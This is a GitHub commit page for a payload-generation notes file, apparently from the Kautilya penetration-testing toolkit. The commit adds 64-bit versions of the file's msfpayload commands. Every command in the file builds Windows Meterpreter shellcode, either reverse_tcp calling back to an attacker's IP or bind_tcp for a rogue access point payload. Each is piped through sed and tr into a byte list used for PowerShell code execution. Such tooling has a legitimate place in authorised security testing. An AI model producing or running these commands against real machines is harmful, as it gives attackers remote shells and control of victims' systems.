Skip to content

Commit 0a683b1

Browse files
committed
Added shellcode generator command for 64 bit machines.
1 parent ac8cccc commit 0a683b1

File tree

1 file changed

+7
-1
lines changed

1 file changed

+7
-1
lines changed

extras/payloadgen.txt

Lines changed: 7 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -5,8 +5,14 @@
55

66
./msfpayload windows/meterpreter/reverse_tcp LHOST=<IP> EXITFUNC=thread C | sed '1,6d;s/[";]//g;s/\\/,0/g' | tr -d '\n' | cut -c2- |sed 's/^[^0]*\(0.*\/\*\).*/\1/' | sed 's/.\{2\}$//' | tr -d '\n'> powershell_codeexec.txt
77

8+
#For 64-bit machines.
9+
./msfpayload windows/x64/meterpreter/reverse_tcp LHOST=<IP> EXITFUNC=thread C | sed '1,6d;s/[";]//g;s/\\/,0/g' | tr -d '\n' | cut -c2- |sed 's/^[^0]*\(0.*\/\*\).*/\1/' | sed 's/.\{2\}$//' | tr -d '\n'> powershell_codeexec.txt
10+
811

912
#For Rogue AP payload, use below command. The generated shellcode file should be copied to the src directory of Kautilya.
1013
#Here LPORT would be the port provided as an option to Kautilya while generating Rogue AP payload.
1114

12-
./msfpayload windows/meterpreter/bind_tcp LPORT=<Port> EXITFUNC=thread C | sed '1,6d;s/[";]//g;s/\\/,0/g' | tr -d '\n' | cut -c2- |sed 's/^[^0]*\(0.*\/\*\).*/\1/' | sed 's/.\{2\}$//' | tr -d '\n'> rogue_ap.txt
15+
./msfpayload windows/meterpreter/bind_tcp LPORT=<Port> EXITFUNC=thread C | sed '1,6d;s/[";]//g;s/\\/,0/g' | tr -d '\n' | cut -c2- |sed 's/^[^0]*\(0.*\/\*\).*/\1/' | sed 's/.\{2\}$//' | tr -d '\n'> rogue_ap.txt
16+
17+
#For 64-bit machines.
18+
./msfpayload windows/x64/meterpreter/bind_tcp LPORT=<Port> EXITFUNC=thread C | sed '1,6d;s/[";]//g;s/\\/,0/g' | tr -d '\n' | cut -c2- |sed 's/^[^0]*\(0.*\/\*\).*/\1/' | sed 's/.\{2\}$//' | tr -d '\n'> rogue_ap.txt

0 commit comments

Comments
 (0)